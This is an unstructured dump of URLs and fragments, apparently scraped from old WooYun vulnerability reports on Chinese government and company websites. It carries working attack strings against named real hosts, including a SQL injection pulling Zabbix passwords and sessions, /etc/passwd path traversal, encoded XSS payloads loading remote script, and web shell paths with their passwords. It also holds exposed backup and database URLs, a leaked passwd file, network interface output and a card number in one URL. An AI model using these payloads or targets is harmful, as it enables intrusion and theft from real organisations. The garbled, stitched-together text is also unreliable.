http://mail.ahedu.gov.cn/login.php https://www.baifubao.com/easypay/0/sendsms/0?phone_number=手机号&sub_bank_code=3002&card_no=6222222222222222&token=5be5f3114b577cd09e1feda4d2ed80fd&card_type=1&contract_flag=0&true_name=xxx&identity_type=1&identity_code=500233199003120049&bind_flag=0&time=1382504056467 http://wooyun.org/bugs/wooyun-2010-037941 http://faq.xiaomi.cn/?user/ask/1.html http://rg.shenzhenair.com/webadmin.nsf http://www.snciq.gov.cn:6198/car/login.action http://um.mama.cn/connect.php?action=view&do=persondetail http://www.duokan.com http://satonline.cn/ http://xincheng.sh.soufun.com/7-8-1.asp?id=568 http://xincheng.sh.soufun.com/media.asp?id=537 http://pdfsprint.foxitsoftware.cn/data_tree/file.php?id=201204201640564f91211850002&page=1 http://pdfprint.foxitsoftware.cn/template.php?Page=1&horizontal=1&cid=&type=1&searchtext=1 http://www.foxitsoftware.cn/info.php http://blog.xiachufang.com/ http://serviceshop.lenovo com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun= http://www.4008123223.cn/user_order_detail.php?id=15930 http://video.mofcom.gov.cn/admina/ http://pdfprint.foxitsoftware.cn:80/data_tree/file.php?id=201203161120424f62b18a995b7 http://dellcity.dell-brand.com/server-info www.hrsoft.com.cn http://m.soufun.com/bbs/ http://www.dpac.gov.cn/www.zip http://www.dpac.gov.cn/www.zip http://eml.sohu.net/.svn/entries http://eml.sohu.net/system/out/.svn/entries http://edm.sohu.net/.svn/entries http://edm.sohu.net/system/out/.svn/entries www.yupoo.com http://blog.yupoo.com/wp-login.php http://125.35.5.78:1000/ http://125.35.5.78:1000/test.aspx http://ucenter.51cto.com/login.php?reback=http://wooyun.org http://www.cioage.com http://bbs.51cto.com http://blog.51cto.com http://selftest.51cto.com http://doctor.51cto.com http://home.51cto.com http://t.51cto.com http://down.51cto.com http://job.51cto.com http://www.beingmate.com/bym2013/index.php/love/detail?id=15922 http://www.aimabz.com/marry/admincp.php?action=login http://xss.tw/4029 url:http://my.xizi.com/index.php?r=message/ajaxadddata&callback=jQuery17203734854192007333_1382543581696&tousername=收信的ID&content=信息内容&_=1382543598882 http://mga.people.com.cn/siteserver/login.aspx http://acjstb.aliyun.com/actionlog/flash/JSocket.swf这个文件。 http://www.tongdao.gov.cn/mlds_manage/hdjlIndex!hdjlIndex.action http://dellcity.dell-brand.com/admin/login.php http://www.bestay.com.cn/Web/Reservation/Select.aspx?Time=1&key=%27and%20user%3E0-- http://211.151.230.34/ http://211.151.230.34:80/ google:inurl:changLang.action www.avms.com.cn:8080/changLang.action www.hxjshy.com:8080/changLang.action http://mobile.tudou.com/# http://dagl.haidilao.com/thamsxp/index.htm http://dagl.haidilao.com/jmx-console/ http://dagl.haidilao.com/a/pwn.jsp?cmd= http://dagl.haidilao.com/thamsxp/install/ url:http://bbs.xizi.com/pw_ajax.php?action=banpost&uid=被禁言ID&callback=jQuery172046430486836470664_1382589403612&step=2&username=被禁言用户名&atc_content=&gid=-1&interface=被禁言天数&_=1382589424428 http://www.tyyb.gov.cn/login/loginAction.do http://sns1.prod.elong.com/hotel/weibolist.php http://sns1.prod.elong.com/hotel/ http://sns1.prod.elong.com/php.php http://www.mingdao.com/home http://app.hanzhong.gov.cn:8080/question/front/questionList.do?typecode=szxx http://www.socl.net/view/jobs/apply.action?jobId=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E http://jyxx.ah.sgcc.com.cn http://123.103.63.241:80/ http://123.103.63.241/ett20/study/usermanage/studentregister1action.jsp http://www.yc-zx.gov.cn/admin/Review.asp?work=type&id=198 http://gm.punchbox.org/feedback.php http://apply.gzgov.gov.cn:81/question/front/questionList.do?typecode=ldxx存在越权 http://app.hanzhong.gov.cn:8080/question/front/showQuestion.do?questionId=85062&typecode=szxx http://gzsvr.lss.gov.cn/question/front/showQuestion.do?questionId=59277&typecode=shjdQN http://app.hanzhong.gov.cn:8080/question/front/showQuestion.do?questionId=85062&typecode=szxx http://gzsvr.lss.gov.cn/question/front/questionList.do?typecode=zxfwQN https://www.ename.net/user/findpassword www.ename.net https://www.ename.net http://travel.elong.com/weblog http://travel.elong.com/log http://demo.zoomla.cn/mis/target/page.aspx http://cloud.ecare365.com/admin/Index.htm http://221.131.216.23:8001/zsr/login.action http://s.hujiang.com/topic/56069/p2/###) data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hzcy5nZC9kMXJ1T3k/MTM4MjYwODE3MT48L3NjcmlwdD4g http://www.86gw.com/hqgs.htm http://www.86gw.com/marry/set_memberstore.php?uname=xshq http://www.aimabz.com/marry/admincp.php?action=login http://www.86gw.com/marry/admincp.php?action=delcoupon&storeid=179 http://www.86gw.com/marry/admincp.php?action=delcoupon&storeid= http://www.aimabz.com/marry/set_index.php?action=set_memberstore&sid=1 http://www.cocochong.com/ajax/ajax.aspx?str=1&type=getart2 http://www.bdhhb.gov.cn/database/PowerEasy2006.mdb http://www.bdhhb.gov.cn/temp/PE_TemplateProject.mdb http://www.bdhhb.gov.cn/Admin/maillist.mdb http://www.glaic.gov.cn/admin/maillist.mdb http://www.glaic.gov.cn/temp/PE_TemplateProject.mdb http://www.pdssjj.gov.cn/Database/SiteWeaver.mdb http://www.pdssjj.gov.cn/Admin/maillist.mdb http://www.snjy.gov.cn/database/SiteWeaver6.5.mdb http://www.snjy.gov.cn/temp/PE_TemplateProject.mdb http://www.snjy.gov.cn/Admin/maillist.mdb http://www.staj.gov.cn/admin/maillist.mdb http://www.staj.gov.cn/database/SiteWeaver6.5.mdb http://www.staj.gov.cn/temp/PE_TemplateProject.mdb http://www.wsj.yc.gov.cn/admin/maillist.mdb http://www.wsj.yc.gov.cn/temp/PE_TemplateProject.mdb http://www.wzrlj.gov.cn/admin/maillist.mdb http://www.wzrlj.gov.cn/temp/PE_TemplateProject.mdb http://www.xclh.gov.cn/admin/maillist.mdb http://www.xclh.gov.cn/Database/SiteWeaver.mdb http://www.ydsfj.gov.cn/admin/maillist.mdb http://www.ydsfj.gov.cn/Database/SiteWeaver.mdb http://www.ydsfj.gov.cn/temp/PE_TemplateProject.mdb http://www.yzrk.gov.cn/admin/maillist.mdb http://www.yzrk.gov.cn/Database/SiteWeaver.mdb http://www.yzrk.gov.cn/temp/PE_TemplateProject.mdb http://www.zkpf.gov.cn/admin/maillist.mdb http://www.zkpf.gov.cn/Database/SiteWeaver.mdb http://www.zkpf.gov.cn/temp/PE_TemplateProject.mdb http://www.bh.gov.cn/website.rar http://www.hljboli.gov.cn/mome.asp?id=217 http://www.dajie.com/corp/3936856/joinus http://www.wjxzsp.gov.cn/wjxzfw/ZXJS/admin.aspx?zxjj=1 http://vip.cnhqt.com/portal/product!index.action http://wed.27.cn/marry/set_index.php?action=set_memberstore&sid=160 http://www.elong.com/promotion/web/elongiphone/index.html http://member.aili.com/note_/note-3492 http://product.aili.com/caches/caches_yp/caches_data/watchjson.cache.php?callback=jsonp138262704199x%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E8 http://uc.wasu.cn/member/index.php/1806972,弹框: http://mini.10010.com/WEB-INF_20130926.tar.gz http://www.jxcb.gov.cn/bao.asp http://beelab.cau.edu.cn/beelab/ http://whnari.sgepri.sgcc.com.cn/right.jsp?pageNo=1&pageCount=2&productType=O0027&p=88952634&title=88952634 http://www.zbzfcg.gov.cn/funonews.ASP?ID=10690 http://www.zbzfcg.gov.cn/admin/admin.asp http://www.gzmama.com,发现注册的账号仍然能使用。 http://www.gzmama.com log:bogonu@192.168.0.34:gz_dzx_post https://cms.pg.com.cn/ http://pgcms.cyberway.cn/ http://www.nanxian.gov.cn/zfxxgk/news_article.asp?id=1528 http://www.nanxian.gov.cn/admin/admin_login.asp http://www.cofcorice.com/admin/ http://3g.peihua.cn/dcpc/login.action http://www.153.cn/indexDo.do http://ent.appchina.com/market/pcsuite/edit.action http://web.huangshan.gov.cn/JA005/bbsDet.aspx?MsgId=20110729101116843311 http://web.huangshan.gov.cn/JA015/Home/Zwgk_List.aspx?typeid=0502&colid=0500 http://jyzx.fj.sgcc.com.cn/iacd/Main.do http://www.sbd.sc.sgcc.com.cn:8088/unzip.php http://www.sgit.sgcc.com.cn/statistics/pma/error.php http://210.73.81.145/ http://210.73.81.145/downfile.php?dir=index&file=../../../../../../../etc/passwd http://210.73.81.145/aml/index.php http://wxpsock.csair.com/logon.html;jsessionid=13zn9c60u2mlny0w73yjv7k1y?param=test http://12580jx.cn/ http://www.autochina360.com/weibo/admin.php?account=3 www.cofco-property.cn/web.config.bak http://open.yuedu.baidu.com/login http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://top.159.com/top.aspx?Field=3&keyword= http://www.gyfg.gov.cn/index.aspx http://www.gyfg.gov.cn/jzxx/admin.asp?xgid=3013 http://bidding.ln.sgcc.com.cn/dynamic_page.jsp?CODE=BM_PROJECT_DETAIL_COPY&projectID=210000000000007167&SHOWTYPE_M0=modify http://b2bindia.lenovocrm.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html# http://india.lenovocrm.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.pwpic.com/wmfilm/submit!list.action http://union.appchina.com/ qq.com/xiaojin http://bbs.appchina.com/test.php http://bbs.appchina.com/phpinfo.php http://wap.139hz.com/comm/manage/login.action http://tuan.aili.com/account/setaddress.php http://www.ceppbooks.sgcc.com.cn/Product2.aspx?p=ZT10000002&id=97875123200029000010 http://breadtrip.com/trips/旅程的ID,可以在URL处查找/delete/ http://breadtrip.com/trips/2387707905/bookmark/ http://breadtrip.com/accounts/logout/ http://www.ename.net http://www.fjjtzj.cn/message!viewMessage.action http://www.fjjtzj.cn/css2.jsp http://www.zjlt.cn/ http://www.iunionet.com/ http://952111.com/ http://b2b.beingmate.com/PubAction.action http://b2b.beingmate.com/loginAction.action http://b2b.beingmate.com/download2.action http://club.beingmate.com/mmKnow/index.jsp http://analytics.tomonline-inc.com/ http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/doc/ http://www.dajie.com/account/feedback http://material.letv.com/material.tar.gz http://www.csrc.gov.cn/pub/newsite/zxbs/ http://202.106.183.121:8080/csrcfund/login!log.action http://demo.acsoft.com.cn/default.aspx http://demo.acsoft.com.cn/user/AdminModifyPwd.aspx http://mfc.siyuanren.com/cms/ http://xueyuan.baihe.com/ http://www.teachina.com/admin/Default.aspx http://www.dyrc114.com/news/topiclist.asp?topicid=7 site:wygk.cn” http://qywz+数字+.wygk.cn/admin/Login.asp http://www.516itravel.com/深航旅游网 http://ui.letv.com/ http://219.143.252.178/ http://ask.huatu.com/ http://ask.huatu.com/gwy/79460.html http://2009.jxrd.gov.cn/jxrd_old/news/show/showrdlist.asp?KindName=%D0%C2%CE%C5%DC%F6%DD%CD&NewsLevel=5&NewsLine=5&NewsStyle=100110&NewsTextFont=9&newslength=80 http://www.gse.pku.edu.cn/jchjy/admin/data/data.mdb http://506pingjia.cofco.com:8080/IR/noticeDetail.jsp?ID=80 http://www.bjrcw.com/link/admin.asp www.8264.com)任意用户密码重置漏洞的形成是由于该网站采用了用户权限集成功能(例:UC-Center)类似于一个通行证方式对用户权限进行验证,只要任意采用该方式验证的站点受到威胁,即可对所有站点的用户信息构成威胁,因此在这种架构中要格外注意各平台安全。 http://t.caijing.com.cn/cjapi/iframe?act=biaoqian&id=663&uid=13 http://fxb.csair.com/a320/p/index.php?logout http://fxb.csair.com/a320/quiz/?u=err http://219.143.252.74/ https://mail.jd.com/owa/auth/logon.aspx http://exchangespigot.codeplex.com/ http://219.134.93.154:8080 rsync://zhangchao@mail.lingyuwangluo.com:8010 http://pdfprint.foxitsoftware.cn/calendarpreview.php?id= http://travel.haier.com/Travel/Hotel/SPHotelInfo/ReLogin.aspx http://506srm.cofco.com/custom/ http://506srm.cofco.com/count/StatDay.asp?QDay=2006-1-undefined1%3CScRiPt%20%3Ealert%281%29%3C/ScRiPt%3E http://506srm.cofco.com/custom/getnewspagedata.aspx?buyGroupId=&child=true&GroupId=142&keyword=&p=&pagetype=GroupNewsList&companyId=1 http://www.teamhd.net(上海腾翼多媒体)是一家专注广告机的公司,旗下IPUB联网数字标牌管理系统4.x系列都存在struts2漏洞。其主站上标示的演示地址同样存在漏洞。详细见证明。 http://blog.tiantianbrowser.com/phpmyadmin/ http://www.zteict.com/newsdetail.aspx?id=299 http://www.zteict.com/admin/login.aspx data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://219.143.252.160/ http://219.143.252.160/about/award.aspx?pro_id=1 http://www.luyuan.cn/ http://www.luyuan.cn/admin/login.php http://www.luyuan.cn/Data/ http://www.luyuan.cn/Data/sqlbackup/oecms_0518_6e326cnzf1_1.sql http://www.cofco-trust.com http://www.cofco-trust.com:8080/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ROOT/ http://www.cofco-trust.com:8080/upload/upload.jsp http://219.143.252.153/ http://219.143.252.185/ http://219.143.252.185/service/productinfo.php?pid=660 http://219.143.252.185/service/productinfo.php?pid=660 http://219.143.252.185/service/productinfo.php?pid=660%E2%80%98 http://61.154.9.17/ http://219.143.252.185:8000/ http://www.zzzydj.gov.cn/admin/xinxi/upload/images/ http://www.zzzydj.gov.cn/admin/xinxi/upload/new_upload.asp http://www.hyws.gov.cn/bszn/class/1ndex.php http://api.easyon.cn:8080/easyon_localinfo/mail.action http://219.143.252.186/ http://116.228.171.23:8080/ http://www.dsgame.cc/shelf/productType.action?parentId=103 http://gss.hisense.com/jmx-console/ http://www.exploit-db.com/exploits/28713/,这是测试poc,仅用于安全测试用哈~~~ www.eol.cn www.eol.cn-2 encap:Ethernet C0:9F:38:C1:95 addr:211.151.91.98 Bcast:211.151.91.111 Mask:255.255.255.240 MTU:1500 packets:1915675700 dropped:144 packets:3921889199 txqueuelen:1000 http://www.chongxin.gansu.gov.cn/wmx/ http://122.226.134.147:8080/customize/nwc_user_enterprise/login/login.html password:123456 password:123456 http://www.dsgame.cc/shelf/productInfo.action?productCode=00001003011741 http://www.xngjj.gov.cn/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1382658290056&isNew=false&frameId=wl_console_frame_1382658290057&sidebarFrameId=wl_console_frame_1382658290058&MBean=mydomain%3AName%3Dmydomain%2CType%3DDomain http://www.shenzhoupiaowu.com/cooperate.do?keyword= http://www.52cs.com.cn/answer.action http://www.114mall.com.cn/exchangecenter/CommodityList.aspx?commTypeID=17 http://www.114mall.cn/cms/ http://app.alipay-inc.com/ http://www.zj114.net.cn/admin/login.do http://passport.zte.com.cn/editorial/ztecn/ch/index.aspx http://passport.zte.com.cn/editorial/ztecn/ch/author/query_article_status.aspx?psu=864DDE32A7279CC0928FC8E806A4D37D http://passport.zte.com.cn/editorial/ztecn/ch/author/modify_article_author.aspx?file_no=200811240000001&author_name=%D7%A8%CC%E2%CD%B6%B8%E5&journal_id=ztecn&psu=864DDE32A7279CC0928FC8E806A4D37D http://passport.zte.com.cn/editorial/ztecn/ch/author/modify_article.aspx?id=201310110000001&flag=0&psu=864DDE32A7279CC0928FC8E806A4D37D&journal_id=ztecn http://www.zte-i.com/admin/ http://www.aoratec.com/queryAllJobs.action http://211.162.125.104/ http://shehui.hc360.com/blog-8734565-1173519.html http://61.50.254.40/thqm/index.action http://61.50.254.63/collectlistByMsisdn.action URL:http://www.qinglanji.com http://hz.mnews.com.cn/mobilenews/loginAction.action http://www.elinkhost.com//plugins/newalipay/ PHPINFO:http://www.elinkhost.com/php.php http://211.140.2.120:8080/logAudit/system/login_createValidateImg.action http://www.decfc.dongfang.com http://www.vmovier.com/album/?aid=54 party.vmovier.com/5yue_intro?t=news&ts=video&id=1 wap.vmovier.com/index.php?id=34587 http://g.yruan.com/env.php http://lis.dongfang.com/logistics/start.do http://192.168.1.1/images/1.gif http://tcdrp.gb246.com/ http://sqlmap.org http://agorabis.travelsky.com/airpt/login.action http://zhaopin.ceair.com http://stockdata.stock.hexun.com//dzjy/outdata/hyfb.ashx?addby=30&callback=hxbase_json13829333644881&count=50&page=1&plate=1&type=8&date=2013-10-25 http://www.luolong.gov.cn/www.rar http://www.dongfang.com.cn http://www.dongfang.com.cn/index.php/searches/index/?searchValue=1% http://www.dongfang.com.cn/index.php/searches/index/?searchValue=1% analytics.gexing.com/config/dbconf.php http://a.dodonew.com/dodonew/front/duserCenter/regist1.jsp?dodoId=100036473499 http://www.xkb.com.au/robots.txt http://login.foresound.net/ http://www.likeface.com/likeface.rar http://hljgswsbs.gov.cn:7001/console/ http://hechun.pba.cn/research.php?rid=1 http://www.81688800.com/,用/inc/conn.asp爆出后台,登录后利用抓包,NC可上传小马,爆出路径/upload/anlisz_oneclass/...asp。见图,然后获得webshell,旗下的站列举: http://www.ytmy168.cn/ http://www.tyhtkj.com/此站域名已被劫持! http://www.jlztjt.com/land/ http://www.jlztjt.com/rice/ http://www.hwjltgyy.com/ http://i-expenses.neusoft.com/netFinance/login.do?method=begin http://i-expenses.neusoft.com/netFinance/netFinance/signfile/ http://www.zh-hr.com:80/jsp/person/ckzw/position-info.jsp?position=331483用sqlmap能看到信息 http://www.zjmc.tv/index.do http://www.zte-e.com/manage/adminlogin.aspx http://cn.club.vmall.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://91baby.mama.cn http://www.longmanenglish.cn/LEI/learner/post.do?operation=openPostReport&postID=179这是论坛的举报帖子时可以想客服反馈的意见。同样存在xss。也同样成功获取cookies。和上面的不是同一个人,但是ip相同,可见你们是处在一个内网^^。两处都能登陆后台, http://www.ubox.cn http://dellcity.dell-brand.com/admin/login.php http://sale.jd.com/act/VCmd4BsWhaF.html http://59.46.220.76/jeecms/ http://59.46.220.76/common/.svn/text-base/page_macro.ftl.svn-base http://59.46.220.76/common/.svn/entries http://demo.zoomla.cn/User/Pages/ViewSmallPub.aspx?Pubid=3&ID=1 http://brandbase.mama.cn/robots.txt/a.php http://www.shantoumama.com/robots.txt/a.php http://91baby.mama.cn/robots.txt/a.php http://stockdata.stock.hexun.com/2008en/zcfz.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/xjll.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/lr.aspx?adate=2012.12.31&stockid=600643&type=0 http://stockdata.stock.hexun.com/2008en/cwbl.aspx?adate=2012.12.31&stockid=000001&type=0 http://stockdata.stock.hexun.com/2008en/zcfz.aspx?adate=2012.12.31&stockid=000001&type=0 http://58.252.3.20/ http://58.252.3.20/Default.aspx http://58.252.3.20/function/main.aspx http://www.xiangcheng.gov.cn/jgsz/sp/adminlogin.php http://www.wanhu.com.cn/ inurl:jsp http://www.ahdx.gov.cn/c:/ http://www.chinafoma.com/c:/ http://www.csagency.com.cn/c:/ http://www.ahsft.gov.cn/c:/ http://www.ahjgxy.com/c:/ http://www.hfol.com.cn:8080/c:/ http://www.wzvcst.edu.cn/c:/ http://www.fydx.gov.cn/c:/ http://www.shsfkyy.com/c:/ http://www.linhai.cn/c:/ http://www.qinglanji.com/index.php?app=article&ac=collect http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://bbs.xd.com/forum.php?mod=viewthread&tid=1549705&extra= http://www.xd.com/zhaopin?id=863&category=%E7%AE%A1%E7%90%86%E5%9F%B9%E8%AE%AD%E7%94%9F&title=%E7%AE%A1%E7%90%86%E5%9F%B9%E8%AE%AD%E7%94%9F http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01 http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01 https://licai.baidu.com/card/0/auth/0/sendsms/0?mobile=随意手机号 http://www.ztbest.com/UserControls/morenewlist.aspx?type=1 http://www.people.com.cn/GB/32306/33232/7518682.html https://www.dnspod.cn/OAuth/Authorize?client_id=10005shit&redirect_uri=https%3A%2F%2Fsupport.dnspod.cn%2FSupport%2Flogincallback%22/%3E%3Cscript/src=//JS地址%3E%3C/script%3E%3Cimg\%22&response_type=code http://www.appeasou.com/user!userLogin.action http://www.ahwh.hrss.gov.cn/news.php?id=3356 http://www.ahwh.hrss.gov.cn/news.php?id=3356 http://www.statsedu.com/staedu/portal/index.do http://www.statsedu.com/staedu/portal/index.do encap:Ethernet B4:B5:2F:51:DF:50 addr:192.168.1.62 Bcast:192.168.1.255 Mask:255.255.255.0 b6b5:2fff:fe51:df50/64 Scope:Link MTU:1500 packets:1388172131 packets:1411189020 txqueuelen:1000 http://www.bankingedu.cn/staedu/portal/index.do http://www.bankingedu.cn/staedu/portal/index.do http://www.bankingedu.cn/staedu/portal/niliu.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin wenhua:x:500:500:wenhua:/home/wenhua:/bin/bash http://shipin.beijing.gov.cn/index.php?option=com_content&ItemId=2 http://cnafc.ulearning.cn/nafcedu/index.html www.ccvic.com.cn http://ccvic.net/admin.php http://points.jinlinghotels.com/ http://www.chinaconstruction.com/5xwzx_2xmxw_xx.aspx?nid=10334 http://www.foxitsoftware.cn/company/press_details.php?&url=../../../../../../etc/passwd http://igaga.cn http://www.landbank.gov.cn/www.zip www.xiaomi.cn使用phpcms搭建 http://www.xiaomi.cn/api.php?op=ajax_domain&url=/etc/passwd http://beta.longmanenglish.cn/LEI/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://beta.longmanenglish.cn/LEI/LEI.war http://www.hyxjgj.com/ http://hoteladmin.byecity.com/tmpordermanage/DefaultTrue.aspx http://hoteladmin.byecity.com/tmpordermanage/OrderDetailTrue.aspx?orderId=278507&tradeId=297279 http://job.vanke.com/Web/Login.aspx http://58.30.217.121 http://58.30.217.121/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://58.30.217.121/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://wf.smesd.gov.cn/view.jsp?id=195429 http://ly.smesd.gov.cn/view.jsp?id=216139 http://hz.smesd.gov.cn/view.jsp?id=248863 http://flfw.smesd.gov.cn/view_liuyan.jsp?id=564 http://glzxxh.smesd.gov.cn/view_liuyan.jsp?id=785 http://jin.smesd.gov.cn/view.jsp?id=258489 http://zzh.smesd.gov.cn/view.jsp?id=203826 http://center.smesd.gov.cn/site/jining/jining/view.jsp?id=179970 www.labi.com http://www.zhujiwu.com/robot/feedback.asp http://www.zhujiwu.com/robot/feedback.asp http://www.zzmama.com http://bbs.zzmama.com/onews.asp?id=176 http://bbs.zzmama.com/admin/index.asp http://www.zzmama.com/admin/adminlogin.asp https://pdc.vanke.com http://www.one-tv.com/sysmanage/ http://91baby.mama.cn/bbbar.php?1383009755 http://www.mama.cn/ask/q3703444-p1.html http://223.4.175.155/ctrl.php?r=site/login http://219.143.252.178/ http://kjt.ahinfo.gov.cn/console/login/LoginForm.jsp http://www.jdxf.gov.cn/readnews.php?newsid=4296 http://www.jdxf.gov.cn/readnews.php?newsid=4296 http://pt-mbb.ele.me/comment http://59.151.23.227/MemberInfo http://monk.uboxol.com/morder/notShipped?clientversion=4.2.1&machine_type=Iphone5&os=7.0&channel_id=1&device_no=abc&imei=&device_id=2&u=530004&wake_id=0&net_type=1&carrier_type=1&s=1 http://219.134.93.143/crmvermgr/ http://219.134.93.143/crystalreportviewers10/ http://crm.shenzhenair.com/crmupdownload/ http://gamebbs.kedou.com/forum.php)是网维大师旗下的一个网站,可用网维大师帐号登录顺网。 http://icafe8.com http://202.107.204.35/stat/login.jsp?templateStatId=1155 http://www.hcgp.gov.cn/console/login.htm http://box.7k7k.com/.viminfo http://box.7k7k.com/manager.tar.gz http://tzxm.fuyang.gov.cn/web/login.action http://tzxm.fuyang.gov.cn/Silic.jsp http://123.232.0.241:7001/aims/jsp/public/login.jsp http://blog.xiami.com/wp-admin http://www.rsks.czs.gov.cn/siexam/person/webApply.action http://my.xizi.com/index.php?r=user/addfollow&callback=jQuery17209595374003984034_1383139467140&follow=1&uid=关注者ID&touid=被关注者ID&_=1383139469893 www.yngbzx.cn http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1 http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1 http://221.209.11.110:8085/wcb/login.action http://newcar.xcar.com.cn/photo_index.php?serid=122 http://transfer.airchina.com http://transfer.airchina.com/web.rar http://transfer.airchina.com/include/func.inc http://transfer.airchina.com/admin/member/ http://transfer.airchina.com/test.php http://transfer.airchina.com/admin/main.php http://fn-sso.ceair.com:7010/sso/sso-login.do http://www.hndfz.hunan.gov.cn/View/ViewPictFrm.aspx?id=206&cid=1 http://bbs.shendu.com/thread-2606000-1-1.html http://www.cregc.com.cn/index2.asp满屏的注入点。成功上传我们的shell密码admin http://www.cregc.com.cn/news/2.asp。探测了下磁盘权限。蛮的大 http://www.facrs.com/dama.asp。密码ice http://vforum2013.cloud-expo.com.cn/ file://C:\Users\用户名\AppData\Roaming\360CloudWifi\expuser.log路径里, http://w.yunpan.360.cn/intf.php http://w%s.yunpan.360.cn/intf.php?method=WifiUser.login&qid=%s&devtype=Wifi&v=&devid=%s&devname=&rtick=6198368&sign=%s& http://api%s.yunpan.360.cn/intf.php?method=User.getUserDetail&qid=%s&devtype=Wifi&v=1.0.0.1030&devid=%s&devname=&rtick=6211423 http://api%s.yunpan.360.cn/intf.php?method=File.getAllNodesV2&qid=%s&devtype=Wifi&v=1.0.0.1030&devid=%s&devname=&rtick=5350229 http://api%s.yunpan.360.cn/intf.php?method=File.delete&qid=%s&devtype=Wifi&v=1.0.0.1050&devid=%s&devname=&rtick=11609065 file://C:\Users\用户名\AppData\Roaming\360CloudWifi\expuser.log中的devid和skey jld.cq.gov.cn/bszn/bsznRight.jsp?id=210&flag=1 android:name=".broadcastReceiver.CloudMessageReceiver android:name="com.jd.msg android:name="com.jd.register.action android:name="com.jd.msg android:name=".providers.BuddyProvider android:readPermission="com.xiaomi.channel.READ_BUDDY android:writePermission="com.xiaomi.channel.WRITE_BUDDY android:exported="true android:authorities="com.xiaomi.channel.providers.BuddyProvider android:name="com.xiaomi.channel.READ_BUDDY android:name="com.xiaomi.channel.WRITE_BUDDY android:name="com.xiaomi.channel.READ_BUDDY android:name="com.xiaomi.channel.WRITE_BUDDY http://vip4.exlive.cn/synthReports/loginGpsAction_login.action 